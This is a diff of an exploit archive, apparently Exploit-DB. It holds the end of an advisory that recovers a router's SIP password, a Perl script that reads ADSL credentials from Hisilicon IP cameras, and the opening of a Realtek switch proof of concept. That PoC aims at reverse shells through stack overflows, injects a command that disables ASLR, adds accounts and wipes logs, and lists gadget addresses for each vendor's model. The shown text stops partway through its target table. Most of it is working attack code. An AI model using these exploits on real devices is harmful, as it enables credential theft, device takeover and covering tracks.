+- Use openssl tool to decrypt your provisioning file. (Put your "des" key
+instead of your-des-key-in-hex-format value and the XXXXXXXXXXXX
+refers the name of your encryption provisioning file, in the -out
+value, the name can be different):
+openssl enc -d -des-ede -nosalt -K your-des-key-in-hex-format -in XXXXXXXXXXXX.enc -out XXXXXXXXXXXX.tar.gz
+- Uncompress the decrypted file:
+tar -xzvf XXXXXXXXXXXX.tar.gz
+- You get the file: Provisioning.conf.
+- Showing the file:
+cat Provisioning.conf
+- The end of the line refers to the secret, the password of your
+SIP account.
+A video was created to show all these Steps in action:
+https://youtu.be/uObz1uE5P4s 
+
+# Additional Information:
+A packet sniffer like Wireshark can be used for retrieve the 3DES key
+instead of using WebSocket communication protocol. In that case, user
+needs to do the login on the router's page, and then the JSON request
+containing the 3DES key will be catched.
+
+# References:
+https://twitter.com/GerardFuguet/status/1169298861782896642
+https://www.slideshare.net/fuguet/call-your-key-to-phone-all
+
+# Timeline:
+2019-06-29 - White Paper done
+2019-07-01 - CVE assigned
+2019-07-09 - Notified to Inteno
+2019-07-11 - Adamo aware and ask for detailed info
+2019-07-12 - Info facilitated
+2019-07-25 - Early patch available and applied (Cooperation starts)
+2019-07-26 - Tested and failed (VoIP not working)
+2019-08-27 - New firmware available
+2019-08-30 - Firmware EG200-WU7P1U_ADAMO3.16.8-190820_0937 applied on router
+2019-08-31 - Tested OK
+2019-09-04 - Disclosure published
\ No newline at end of file
diff --git a/exploits/hardware/remote/47405.pl b/exploits/hardware/remote/47405.pl
new file mode 100755
index 000000000..faa5ef698
--- /dev/null
+++ b/exploits/hardware/remote/47405.pl
@@ -0,0 +1,114 @@
+#!/usr/bin/perl -w
+#
+#  Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
+#
+#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
+#
+#
+#	#  [ 
+#	#  [ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
+#	#  [ =============================================================
+#	#  [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
+#	#  [
+#	#  [  Disclaimer:
+#	#  [  This or previous programs are for Educational purpose
+#	#  [  ONLY. Do not use it without permission. The usual 
+#	#  [  disclaimer applies, especially the fact that Todor Donev
+#	#  [  is not liable for any damages caused by direct or 
+#	#  [  indirect use of the  information or functionality provided
+#	#  [  by these programs. The author or any Internet provider 
+#	#  [  bears NO responsibility for content or misuse of these 
+#	#  [  programs or any derivatives thereof. By using these programs 
+#	#  [  you accept the fact that any damage (dataloss, system crash, 
+#	#  [  system compromise, etc.) caused by the use  of these programs
+#	#  [  are not Todor Donev's responsibility.
+#	#  [   
+#	#  [ Use them at your own risk!
+#	#  [
+#	#  [ Initializing the browser
+#	#  [ Server: thttpd/2.25b 29dec2003
+#	#  [ The target is vulnerable
+#	#  [
+#	#  [ Directory Traversal
+#	#  [
+#	#  [ /cgi-bin/..
+#	#  [ /cgi-bin/adsl_init.cgi
+#	#  [ /cgi-bin/chkwifi.cgi
+#	#  [ /cgi-bin/ddns_start.cgi
+#	#  [ /cgi-bin/getadslattr.cgi
+#	#  [ /cgi-bin/getddnsattr.cgi
+#	#  [ /cgi-bin/getinetattr.cgi
+#	#  [ /cgi-bin/getinterip.cgi
+#	#  [ /cgi-bin/getnettype.cgi
+#	#  [ /cgi-bin/getupnp.cgi
+#	#  [ /cgi-bin/getwifi.cgi
+#	#  [ /cgi-bin/getwifiattr.cgi
+#	#  [ /cgi-bin/ptzctrldown.cgi
+#	#  [ /cgi-bin/ptzctrlleft.cgi
+#	#  [ /cgi-bin/ptzctrlright.cgi
+#	#  [ /cgi-bin/ptzctrlup.cgi
+#	#  [ /cgi-bin/ptzctrlzoomin.cgi
+#	#  [ /cgi-bin/ptzctrlzoomout.cgi
+#	#  [ /cgi-bin/ser.cgi
+#	#  [ /cgi-bin/setadslattr.cgi
+#	#  [ /cgi-bin/setddnsattr.cgi
+#	#  [ /cgi-bin/setinetattr.cgi
+#	#  [ /cgi-bin/setwifiattr.cgi
+#	#  [ /cgi-bin/testwifi.cgi
+#	#  [ /cgi-bin/upnp_start.cgi
+#	#  [ /cgi-bin/upnp_stop.cgi
+#	#  [ /cgi-bin/wifi_start.cgi
+#	#  [ /cgi-bin/wifi_stop.cgi
+#	#  [ 
+#	#  [ File Reading
+#	#  [
+#	#  [ var ip = "" ;
+#	#  [ var adslenable = "" ;
+#	#  [ var username = "hacker" ;
+#	#  [ var password = "133337" ;
+#	#  [ var dnsauto = "1" ;
+#	#  [ var dns1 = "8.8.8.8" ;
+#	#  [ var dns2 = "8.8.4.4" ;
+#
+# 
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use HTML::TreeBuilder;
+$| = 1;
+my $host = shift || 'https://192.168.1.1/'; # Full path url to the store
+print "\033[2J";    #clear the screen
+print "\033[0;0H"; #jump to 0,0
+
+my $banner =  "\x5b\x20\x0a\x5b\x20\x48\x69\x73\x69\x6c\x69\x63\x6f\x6e\x20\x48\x69\x49\x70\x63\x61\x6d\x20\x56\x31\x30\x30\x52\x30\x30\x33\x20\x52\x65\x6d\x6f\x74\x65\x20\x41\x44\x53\x4c\x20\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73\x20\x44\x69\x73\x63\x6c\x6f\x73\x75\x72\x65\x0a\x5b\x20\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x5b\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\x41\x75\x74\x68\x6f\x72\x3a\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x20\x32\x30\x31\x39\x20\x3c\x74\x6f\x64\x6f\x72\x2e\x64\x6f\x6e\x65\x76\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3e\x0a\x5b\x0a\x5b\x20\x20\x44\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x3a\x0a\x5b\x20\x20\x54\x68\x69\x73\x20\x6f\x72\x20\x70\x72\x65\x76\x69\x6f\x75\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x61\x72\x65\x20\x66\x6f\x72\x20\x45\x64\x75\x63\x61\x74\x69\x6f\x6e\x61\x6c\x20\x70\x75\x72\x70\x6f\x73\x65\x0a\x5b\x20\x20\x4f\x4e\x4c\x59\x2e\x20\x44\x6f\x20\x6e\x6f\x74\x20\x75\x73\x65\x20\x69\x74\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x2e\x20\x54\x68\x65\x20\x75\x73\x75\x61\x6c\x20\x0a\x5b\x20\x20\x64\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x20\x61\x70\x70\x6c\x69\x65\x73\x2c\x20\x65\x73\x70\x65\x63\x69\x61\x6c\x6c\x79\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x0a\x5b\x20\x20\x69\x73\x20\x6e\x6f\x74\x20\x6c\x69\x61\x62\x6c\x65\x20\x66\x6f\x72\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x73\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x64\x69\x72\x65\x63\x74\x20\x6f\x72\x20\x0a\x5b\x20\x20\x69\x6e\x64\x69\x72\x65\x63\x74\x20\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x20\x20\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x20\x6f\x72\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x61\x6c\x69\x74\x79\x20\x70\x72\x6f\x76\x69\x64\x65\x64\x0a\x5b\x20\x20\x62\x79\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x2e\x20\x54\x68\x65\x20\x61\x75\x74\x68\x6f\x72\x20\x6f\x72\x20\x61\x6e\x79\x20\x49\x6e\x74\x65\x72\x6e\x65\x74\x20\x70\x72\x6f\x76\x69\x64\x65\x72\x20\x0a\x5b\x20\x20\x62\x65\x61\x72\x73\x20\x4e\x4f\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x20\x66\x6f\x72\x20\x63\x6f\x6e\x74\x65\x6e\x74\x20\x6f\x72\x20\x6d\x69\x73\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x0a\x5b\x20\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x6f\x72\x20\x61\x6e\x79\x20\x64\x65\x72\x69\x76\x61\x74\x69\x76\x65\x73\x20\x74\x68\x65\x72\x65\x6f\x66\x2e\x20\x42\x79\x20\x75\x73\x69\x6e\x67\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x0a\x5b\x20\x20\x79\x6f\x75\x20\x61\x63\x63\x65\x70\x74\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x20\x28\x64\x61\x74\x61\x6c\x6f\x73\x73\x2c\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x72\x61\x73\x68\x2c\x20\x0a\x5b\x20\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x6f\x6d\x70\x72\x6f\x6d\x69\x73\x65\x2c\x20\x65\x74\x63\x2e\x29\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x74\x68\x65\x20\x75\x73\x65\x20\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x0a\x5b\x20\x20\x61\x72\x65\x20\x6e\x6f\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x27\x73\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x2e\x0a\x5b\x20\x20\x20\x0a\x5b\x20\x55\x73\x65\x20\x74\x68\x65\x6d\x20\x61\x74\x20\x79\x6f\x75\x72\x20\x6f\x77\x6e\x20\x72\x69\x73\x6b\x21\x0a\x5b\x0a";
+
+print $banner;
+
+print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+   $browser->timeout(30);
+   $browser->agent($user_agent);
+my $target = $host."/cgi-bin/";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);                      
+my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');
+print "[ Server: ", $response->header('Server'), "\n";
+if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){
+    print "[ The target is vulnerable\n";
+    print "[\n[ Directory Traversal\n";
+    my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
+    my @files = $tree->look_down(_tag => 'a');
+    print "[ ", $_->attr('href'), "\n" for @files;
+    my $target = $host."/cgi-bin/getadslattr.cgi";
+    my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
+    my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+    print "[\n[ File Reading\n";
+    print "[ ", $_, "\n" for split(/\n/,$response->content());
+
+} else { 
+        print "[ Exploit failed! The target isn't vulnerable\n";
+        exit;
+}
\ No newline at end of file
diff --git a/exploits/hardware/remote/47442.py b/exploits/hardware/remote/47442.py
new file mode 100755
index 000000000..e5d3d9730
--- /dev/null
+++ b/exploits/hardware/remote/47442.py
@@ -0,0 +1,8299 @@
+#!/usr/bin/python2.7
+#
+"""
+
+[Subject]
+
+Realtek Managed Switch Controller (RTL83xx) PoC (2019 bashis)
+https://www.realtek.com/en/products/communications-network-ics/category/managed-switch-controller
+
+[Brief description]
+
+1.	Boa/Hydra suffer of exploitable stack overflow with a 'one byte read-write loop' w/o boundary check. (all FW version and vendors affected)
+	Note: The vulnerability are _not_ from Boa nor Hydra, coming from Realtek additional coding
+2.	Reuse of code between vendors gives almost indentical exploitation of found vulnerabilities
+3.	Two strcpy() vulnerable fixed buffers next to each others in same function make it easy for jumping in Big Endian
+
+[Goals for this PoC]
+
+1.	One Python PoC for all vendors
+	Using dictionaries to have one 'template' for each vendor and another dictionary with unique details for each target, to be merged on the fly.
+	The python code will read and use details from dictionary when verifying/exploiting
+
+2.	Uniquely identify remote target
+	ETag - Static and excellent tool for determine remote target, due to non-changing 'last modified' in same revision of Firmware
+
+	ETag: xxxxx-yyyyy
+	xxxxx = file size (up to 5 digits)
+	yyyyy = last modified (up to 5 digits)
+
+3.	Reverse shell
+	MIPS Big Endian shellcode is the only option, as there are no 'netcat/telnet/stunnel.. etc' availible
+
+4.	add/delete credentials for GUI/CLI
+	Quite many of the firmware's has the 'option' to add valid credentials by unauthorized updating of 'running-config'
+	For those who has added protection, we can add/delete credentials with an bit interesting jumping sequence
+
+[Technical brief]
+1.	Stack       - Read/Write/Executable (Using CMD injection in the PoC to turn off ASLR)
+2.	Heap        - Read/Write/Executable (No need to turn off, ASLR not turned on for heap)
+3.	fork        - Boa/Hydra using forking shellcode, as I want try restart Boa/Hydra to avoid DoS after successful reverse shell
+
+Two vulnerable buffers with fixed size in same call, we overwrite $RA with four bytes, and overwrite first byte in $RA with second buffers NULL termination,
+this allows us to jump within the binary itself, and passing arguments for the function we jumping to by tailing these with the original request
+
+[Basically]
+First buffer:         [aaaaaaaa][0x58xxxxxx]	('a' and 0x58 will be overwritten by second buffer)
+Second buffer: [bbbbb][bbbbbbbb][0x00xxxxxx]	(NULL termination will overwrite 0x58)
+
+[Known targets]
+
+All below is fully exploitable, with following exception:
+[*] ETag: 639-98866   [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]
+[*] ETag: 639-73124   [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]
+
+Not because they are not vulnerable, its because 1) their heap addresses lays at the '0x478000-0x47a000' range,
+and 2) they using obfuscation 'encode' for the password (99 bytes max), we can never reach the 'two buffers' jump method.
+[They are still fully exploitable with the Boa/Hydra vulnerability]
+
+Note:
+In this PoC I have only implemented few affected versions, in reality there is many more models and FW version affected.
+
+
+$ ./Realtek-RTL83xx-PoC.py --etag help
+
+[*] Realtek Managed Switch Controller RTL83xx PoC (2019 bashis)
+[*] RHOST: 192.168.57.20
+[*] RPORT: 80
+[*] LHOST: 192.168.57.1
+[*] LPORT: 1337
+[+] Target: List of known targets
+
+[*] ETag: 225-51973   [Cisco Systems, Inc. Sx220 v1.1.3.1]
+[*] ETag: 225-60080   [Cisco Systems, Inc. Sx220 v1.1.4.1]
+[*] ETag: 752-76347   [ALLNET GmbH Computersysteme ALL-SG8208M v2.2.1]
+[*] ETag: 225-21785   [Pakedgedevice & Software Inc SX-8P v1.04]
+[*] ETag: 222-71560   [Zyxel Communications Corp. GS1900-24 v2.40_AAHL.1_20180705]
+[*] ETag: 14044-509   [EnGenius Technologies, Inc. EGS2110P v1.05.20_150810-1754]
+[*] ETag: 13984-12788 [Open Mesh, Inc. OMS24 v01.03.24_180823-1626]
+[*] ETag: 218-22429   [PLANET Technology Corp. GS-4210-8P2S v1.0b171116]
+[*] ETag: 218-7473    [PLANET Technology Corp. GS-4210-24T2S v2.0b160727]
+[*] ETag: 752-95168   [DrayTek Corp. VigorSwitch P1100 v2.1.4]
+[*] ETag: 225-96283   [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.6]
+[*] ETag: 225-63242   [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.5]
+[*] ETag: 224-5061    [CERIO Corp. CS-2424G-24P v1.00.29]
+[*] ETag: 222-50100   [ALLNET GmbH Computersysteme ALL-SG8310PM v3.1.1-R3-B1]
+[*] ETag: 222-81176   [Shenzhen TG-NET Botone Technology Co,. Ltd. P3026M-24POE (V3) v3.1.1-R1]
+[*] ETag: 8028-89928  [Araknis Networks AN-310-SW-16-POE v1.2.00_171225-1618]
+[*] ETag: 222-64895   [Xhome DownLoop-G24M v3.0.0.43126]
+[*] ETag: 222-40570   [Realtek RTL8380-24GE-4GEC v3.0.0.43126]
+[*] ETag: 222-45866   [Abaniact AML2-PS16-17GP L2 v116B00033]
+[*] ETag: 14044-44104 [EnGenius Technologies, Inc. EWS1200-28TFP v1.07.22_c1.9.21_181018-0228]
+[*] ETag: 14044-32589 [EnGenius Technologies, Inc. EWS1200-28TFP v1.06.21_c1.8.77_180906-0716]
+[*] ETag: 609-31457   [NETGEAR Inc. GS750E ProSAFE Plus Switch v1.0.0.22]
+[*] ETag: 639-98866   [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]
+[*] ETag: 639-73124   [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]
+
+
+[*] All done...
+
+[Other vendors]
+These names have been found within some Firmware images, but not implemented as I have not found any Firmware images.
+(However, I suspect they use exact same Firmware due to the traces are 'logo[1-10].jpg/login[1-10].jpg')
+
+[*] 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology, Wanbroad, Plexonics, Mach Power
+
+[Known bugs]
+1.	Non-JSON:
+	'/mntlog/flash.log' and '/var/log/flash.log' not always removed when using 'stack_cgi_log()'
+	(Must change value for 'flash.log' that needs to be 0x02, 'flash.log' has value 0x00)
+
+[Responsible Disclosure]
+Working with VDOO since early February 2019 to disclosure found vulnerabilities to vendors
+https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches
+
+
+[Technical details]
+Please read the code
+
+"""
+# Have a nice day
+# /bashis
+#
+
+import string
+import sys
+import socket
+import argparse
+import urllib, urllib2, httplib
+import base64
+import ssl
+import hashlib
+import re
+import struct
+import time
+import thread
+import json
+import inspect
+import copy
+
+import hashlib
+from Crypto.Cipher import AES
+from Crypto.Cipher import PKCS1_v1_5
+from Crypto.PublicKey import RSA
+from Crypto import Random
+from random import randint
+
+from pwn import * # pip install pwn
+
+global debug
+debug = False
+global force
+force = False
+
+def DEBUG(direction, text):
+	if debug:
+		# Print send/recv data and current line number
+		print "[BEGIN {}] <{:-^60}>".format(direction, inspect.currentframe().f_back.f_lineno)
+		print "\n{}\n".format(text)
+		print "[ END  {}] <{:-^60}>".format(direction, inspect.currentframe().f_back.f_lineno)
+	return
+
+class HTTPconnect:
+
+	def __init__(self, host, proto, verbose, creds, Raw):
+		self.host = host
+		self.proto = proto
+		self.verbose = verbose
+		self.credentials = creds
+		self.Raw = Raw
+	
+	def Send(self, uri, query_headers, query_data,ID,encode_query):
+		self.uri = uri
+		self.query_headers = query_headers
+		self.query_data = query_data
+		self.ID = ID
+		self.encode_query = encode_query
+
+		# Connect-timeout in seconds
+		#timeout = 5
+		#socket.setdefaulttimeout(timeout)
+
+		url = '{}://{}{}'.format(self.proto, self.host, self.uri)
+
+		if self.verbose:
+			log.info("[Verbose] Sending: {}".format(url))
+
+		if self.proto == 'https':
+			if hasattr(ssl, '_create_unverified_context'):
+				#log.info("Creating SSL Unverified Context")
+				ssl._create_default_https_context = ssl._create_unverified_context
+
+		if self.credentials:
+			Basic_Auth = self.credentials.split(':')
+			if self.verbose:
+				log.info("[Verbose] User: {}, Password: {}".format(Basic_Auth[0],Basic_Auth[1]))
+			try:
+				pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
+				pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
+				auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
+				opener = urllib2.build_opener(auth_handler)
+				urllib2.install_opener(opener)
+			except Exception as e:
+				log.info("Basic Auth Error: {}".format(e))
+				sys.exit(1)
+
+		if self.query_data:
+			#request = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers)
+			if self.query_data and self.encode_query:
+				request = urllib2.Request(url, data=urllib.urlencode(self.query_data,doseq=True), headers=self.query_headers)
+			else:
+				request = urllib2.Request(url, data=self.query_data, headers=self.query_headers)
+
+			if self.ID:
+				request.add_header('Cookie', self.ID)
+		else:
+			request = urllib2.Request(url, None, headers=self.query_headers)
+			if self.ID:
+				request.add_header('Cookie', self.ID)
+		response = urllib2.urlopen(request)
+		#if response:
+		#	print "[<] {} OK".format(response.code)
+
+		if self.Raw:
+			return response
+		else:
+			html = response.read()
+			return html
+
+#
+# Validate correctness of HOST, IP and PORT
+#
+class Validate:
+
+	def __init__(self,verbose):
+		self.verbose = verbose
+
+	# Check if IP is valid
+	def CheckIP(self,IP):
+		self.IP = IP
+
+		ip = self.IP.split('.')
+		if len(ip) != 4:
+			return False
+		for tmp in ip:
+			if not tmp.isdigit():
+				return False
+		i = int(tmp)
+		if i < 0 or i > 255:
+			return False
+		return True
+
+	# Check if PORT is valid
+	def Port(self,PORT):
+		self.PORT = PORT
+
+		if int(self.PORT) < 1 or int(self.PORT) > 65535:
+			return False
+		else:
+			return True
+
+	# Check if HOST is valid
+	def Host(self,HOST):
+		self.HOST = HOST
+
+		try:
+			# Check valid IP
+			socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP
+			# Now we check if it is correct typed IP
+			if self.CheckIP(self.HOST):
+				return self.HOST
+			else:
+				return False
+		except socket.error as e:
+			# Else check valid FQDN name, and use the IP address
+			try:
+				self.HOST = socket.gethostbyname(self.HOST)
+				return self.HOST
+			except socket.error as e:
+				return False
+
+class Vendor:
+
+	def __init__(self, ETag):
+		self.ETag = ETag
+
+	def random_string(self,length):
+		self.length = length
+
+		return "a" * self.length
+		#return ''.join(random.choice(string.lowercase) for i in range(self.length))
+
+	#
+	# Source: https://gist.github.com/angstwad/bf22d1822c38a92ec0a9
+	#
+	def dict_merge(self, dct, merge_dct):
+		""" Recursive dict merge. Inspired by :meth:``dict.update()``, instead of
+		updating only top-level keys, dict_merge recurses down into dicts nested
+		to an arbitrary depth, updating keys. The ``merge_dct`` is merged into
+		``dct``.
+		:param dct: dict onto which the merge is executed
+		:param merge_dct: dct merged into dct
+		:return: None
+		"""
+		for k, v in merge_dct.iteritems():
+			if (k in dct and isinstance(dct[k], dict)
+					and isinstance(merge_dct[k], collections.Mapping)):
+				self.dict_merge(dct[k], merge_dct[k])
+			else:
+				dct[k] = merge_dct[k]
+
+
+	#
+	# Difference between vendors and Firmware versions.
+	# The update code will search below and update the template on the fly
+	# (you can tweak and add code in the template from here)
+	#
+	# ETag - excellent tool for determine the target
+	#
+	# ETag: xxxxx-yyyyy
+	# xxxxx = file size (up to 5 digits)
+	# yyyyy = last modified (up to 5 digits)
+	#
+	def dict(self):
+
+		Vendor_ETag = {
+			#
+			# PLANET Technology Corp.
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : No
+			# Del /mntlog/flash.log  : No
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'218-22429': {
+				'template':'Planet',					# Static for the vendor
+				'version':'1.0b171116',					# Version / binary dependent stuff
+				'model':'GS-4210-8P2S',				# Model
+				'uri':'https://www.planet.com.tw/en/product/GS-4210-8P2S',
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40E04C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f99851c,			# la $t9, system) # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x2484029c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+					'stack_cgi_diag': {
+						# Ping IPv4
+						'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
+						'verify_uri':'/tmp/check',
+						'web_sys_ping_post':0x423B9C,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()
+						# traceroute
+						#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&tr_maxhop=30&count=1',
+						#'verify_uri':'/tmp/check',
+						#'web_sys_ping_post':0x4243FC,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()
+						'vulnerable': True,
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
+						'log_settings_set':0x489368,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
+						'log_ramClear':0x48AB84,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
+						'log_fileClear':0x48C240,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+						'sys_timeSntp_set':0x42DA80,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+						'sys_timeSntpDel_set':0x42DA80,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
+						'sys_timeSettings_set':0x42C868,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': True,
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
+						'START':0x7ffeee04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 45,					# filler/garbage (not used for something constructive)
+						'align': 3,						# Align opcodes in memory
+						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+			'218-7473': {
+				'template':'Planet',					# Static for the vendor
+				'version':'2.0b160727',					# Version / binary dependent stuff
+				'model':'GS-4210-24T2S',				# Model
+				'uri':'https://www.planet.com.tw/en/product/GS-4210-24T2S',
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40E04C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f99851c,			# la $t9, system) # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x2484029c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+					'stack_cgi_diag': {
+						# Ping IPv4
+						'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
+						'verify_uri':'/tmp/check',
+						'web_sys_ping_post':0x424594,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()
+
+						# traceroute
+						#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&tr_maxhop=30&count=1',
+						#'verify_uri':'/tmp/check',
+						#'web_sys_ping_post':0x424DF4,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()
+						'vulnerable': True,
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
+						'log_settings_set':0x48AA98,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
+						'log_ramClear':0x48D9F4,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
+						'log_fileClear':0x48D9F4,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+						'sys_timeSntp_set':0x42E474,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
